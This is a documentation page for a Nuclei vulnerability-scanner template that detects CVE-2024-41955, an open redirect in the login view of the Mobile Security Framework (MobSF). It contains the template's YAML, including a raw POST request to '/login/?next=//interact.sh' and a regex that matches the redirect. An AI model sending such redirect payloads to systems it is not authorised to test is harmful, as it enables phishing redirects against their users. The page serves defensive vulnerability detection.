Skip to content
Nuclei Templates

Open Redirect in Login Redirect - MobSF

ID: CVE-2024-41955

Severity: medium

Author: Farish

Tags: cve,cve2024,open-redirect,mobsf,authenticated

Description

Section titled “Description”

Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view.

YAML Source

Section titled “YAML Source”
id: CVE-2024-41955


info:
  name: Open Redirect in Login Redirect - MobSF
  author: Farish
  severity: medium
  description: |
    Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
  reference:
    - https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/fdaad81314f393d324c1ede79627e9d47986c8c8
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41955
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41955
    - https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-8m9j-2f32-2vx4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:N
    cvss-score: 5.2
    cve-id: CVE-2024-41955
    cwe-id: CWE-601
  metadata:
    max-request: 1
    verified: true
    vendor: mobsf
    product: mobsf
    fofa-query: "MobSF"
  tags: cve,cve2024,open-redirect,mobsf,authenticated


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /login/?next=//interact.sh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        username={{username}}&password={{password}}


    host-redirects: true
    matchers:
      - type: regex
        part: header_2
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 4a0a00473045022100d2f202d6ba8813178d3bbbfece0504105e4375db9e673da1b24c3757b0ac05ce02207a3aa99ccf2e9d96cd6461d0c587dcc2514f5f1b7b7f8ada0ed5511780c4cba9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-41955.yaml"

View on Github